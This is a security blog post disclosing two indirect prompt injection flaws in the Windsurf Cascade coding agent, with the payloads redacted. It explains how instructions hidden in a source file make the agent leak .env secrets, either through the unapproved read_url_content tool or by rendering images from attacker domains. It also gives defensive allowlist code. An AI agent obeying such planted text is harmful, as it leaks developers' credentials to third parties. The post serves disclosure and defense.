This is the first post in a series exploring security vulnerabilities in Windsurf. If you are unfamiliar with Windsurf, it is a fork of VS Code and the coding agent is called Windsurf Cascade.
The attack vectors we will explore today allow an adversary to exfiltrate data from the developer’s machine via indirect prompt injection.
These vulnerabilities are a great example of Simon Willison’s lethal trifecta pattern.
Overall, the security vulnerability reporting experience with Windsurf has not been great. All findings were responsibly disclosed on May 30, 2025, and receipt was acknowledged a few days later. However, all further inquiries regarding bug status or fixes remain unanswered. The recent business disruptions and departure of CEO and core team members certainly put Windsurf in the news.
Let’s explore this in detail.
When looking at a new system, I always take a peek at the system prompt first. I’m looking for tools that could be invoked during a prompt injection attack. Sometimes there are also other interesting tidbits present.
Here is a snippet of the system prompt:
You can find the Windsurf Cascade system prompt here.
One thing that stood out to me right away was the read_url_content tool.
As the name read_url_content suggests, this tool allows Windsurf to connect to a website and read data from it. However, a reading capability can also serve as a data exfiltration channel, because the outbound HTTP request itself can carry data. And this tool does not require user approval, so an adversary can invoke it during an indirect prompt injection attack without any user confirmation.
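To make that point concrete, here is a minimal Python sketch of why a "read" is also a "write": whatever ends up in the requested URL is delivered to the server that receives the request. The host `attacker.example`, the query parameter `d`, and both function names are hypothetical and chosen only for illustration; this is not the redacted payload and not how Windsurf implements the tool.

```python
from urllib.parse import parse_qs, urlencode, urlsplit


def build_fetch_url(base: str, payload: str) -> str:
    """Build the kind of URL an injected instruction could ask an agent to fetch.

    The payload is percent-encoded into the query string (hypothetical parameter "d").
    """
    return f"{base}?{urlencode({'d': payload})}"


def what_server_sees(url: str) -> str:
    """Recover the payload from the request URL, as a server-side access log could."""
    return parse_qs(urlsplit(url).query)["d"][0]


# Placeholder value standing in for the contents of a .env file.
url = build_fetch_url("https://attacker.example/collect", "API_KEY=not-a-real-secret")
print(url)
print(what_server_sees(url))
```

No response body is needed for the leak to happen: the data has left the machine as soon as the request is sent.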
The prompt injection exploit for this demo is stored in a source code file. This represents one plausible attack vector, but certainly not the only one!
Now, when the developer analyzes the file with Windsurf Cascade, the embedded instructions hijack the AI agent and exfiltrate the contents of the .env file using the read_url_content tool.
The above screenshot shows how by simply analyzing a file with Windsurf, the text within it can hijack Windsurf Cascade to exfiltrate sensitive information from the developer’s workstation.
This video shows how such an exploit chain looks end-to-end:
This is the text at the beginning of the source code file:
<redacted for now, as this is not fixed>
With this simple proof-of-concept payload, the AI agent is hijacked to exfiltrate sensitive environment variables and other information as it analyzes the file, all without requiring user approval.
The second attack vector is quite similar to a vulnerability I found in GitHub Copilot last year, which Microsoft has since fixed. You can read the details here.
Image rendering from untrusted domains is actually one of the most common AI application security vulnerabilities to be aware of. We have seen dozens of examples of this vulnerability over the last two+ years.
As with the many similar attacks we have shown, this does not require a human in the loop: data leaks as soon as the application renders an image from an untrusted domain.
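One common mitigation for this class of issue is to only render images from an allowlist of trusted hosts. The following is a rough Python sketch of that idea, assuming the agent's output is Markdown; the function name, the regular expression, and the host `docs.example.com` are illustrative assumptions and do not reflect how Windsurf renders output.

```python
import re
from urllib.parse import urlsplit

# Matches Markdown images of the form ![alt](url "optional title").
IMAGE_RE = re.compile(r"!\[([^\]]*)\]\(\s*([^)\s]+)[^)]*\)")


def strip_untrusted_images(markdown: str, allowed_hosts: set[str]) -> str:
    """Replace images whose host is not explicitly allowed with a text placeholder."""

    def replace(match: re.Match) -> str:
        alt, url = match.group(1), match.group(2)
        host = urlsplit(url).hostname  # None for relative or malformed URLs
        if host is not None and host in allowed_hosts:
            return match.group(0)  # keep the image unchanged
        return f"[image removed: {alt}]"

    return IMAGE_RE.sub(replace, markdown)


text = (
    "ok ![logo](https://docs.example.com/logo.png) "
    "bad ![x](https://attacker.example/p.png?d=SECRET)"
)
print(strip_untrusted_images(text, {"docs.example.com"}))
```

The filter runs on the model's output before rendering, so it does not depend on the model resisting the injection. In this sketch relative URLs are removed as well, which is a deliberately conservative choice.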
To keep things short in this post, the following screenshot shows the end-to-end exploit chain:
This shows how Windsurf is hijacked and exfiltrates sensitive information from the developer’s workstation to a third-party server.
This is the text at the beginning of the source code file:
<redacted for now, as this is not fixed>
That’s all that was needed to hijack Windsurf Cascade.
These vulnerabilities were disclosed to Windsurf on May 30, 2025, and receipt was acknowledged by Windsurf a few days later. However, all further inquiries around triage, bug status or fixes remain unanswered.
Hence, disclosing this publicly after ~3 months seems the best approach to raise awareness and educate customers and users about these high-severity vulnerabilities.
read_url_content tool with untrusted servers
Windsurf Cascade is vulnerable to prompt injection, and since there is no deterministic solution to fix prompt injection itself, security has to be enforced downstream of LLM output.
As demonstrated, weaknesses in tool invocation and image rendering can be exploited by a third-party attacker who embeds malicious instructions in source code, on websites, or via RAG poisoning. When Cascade analyzes such content, it becomes a “confused deputy,” potentially leading to data exfiltration.
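As an illustration of what enforcing security downstream of LLM output could look like for a URL-fetching tool, here is a minimal Python sketch of a deterministic gate that sits between the model's tool call and the network. The function name `requires_approval` and the hosts in `TRUSTED_HOSTS` are hypothetical; this is one possible design under those assumptions, not Windsurf's implementation.

```python
from urllib.parse import urlsplit

# Hypothetical allowlist; a real deployment would make this user-configurable.
TRUSTED_HOSTS = {"docs.python.org", "developer.mozilla.org"}


def requires_approval(url: str, trusted_hosts: set[str] = TRUSTED_HOSTS) -> bool:
    """Return True when a fetch of `url` should pause for explicit user confirmation."""
    try:
        parts = urlsplit(url)
    except ValueError:
        return True  # malformed URL: fail closed
    if parts.scheme != "https":
        return True
    host = parts.hostname
    # Exact host match, so "docs.python.org.attacker.example" is not trusted.
    return host is None or host not in trusted_hosts


for candidate in (
    "https://docs.python.org/3/",
    "https://attacker.example/collect?d=SECRET",
):
    print(candidate, "->", "ask user" if requires_approval(candidate) else "allow")
```

Because the check is ordinary code rather than another prompt, its decision cannot be changed by text the model has read.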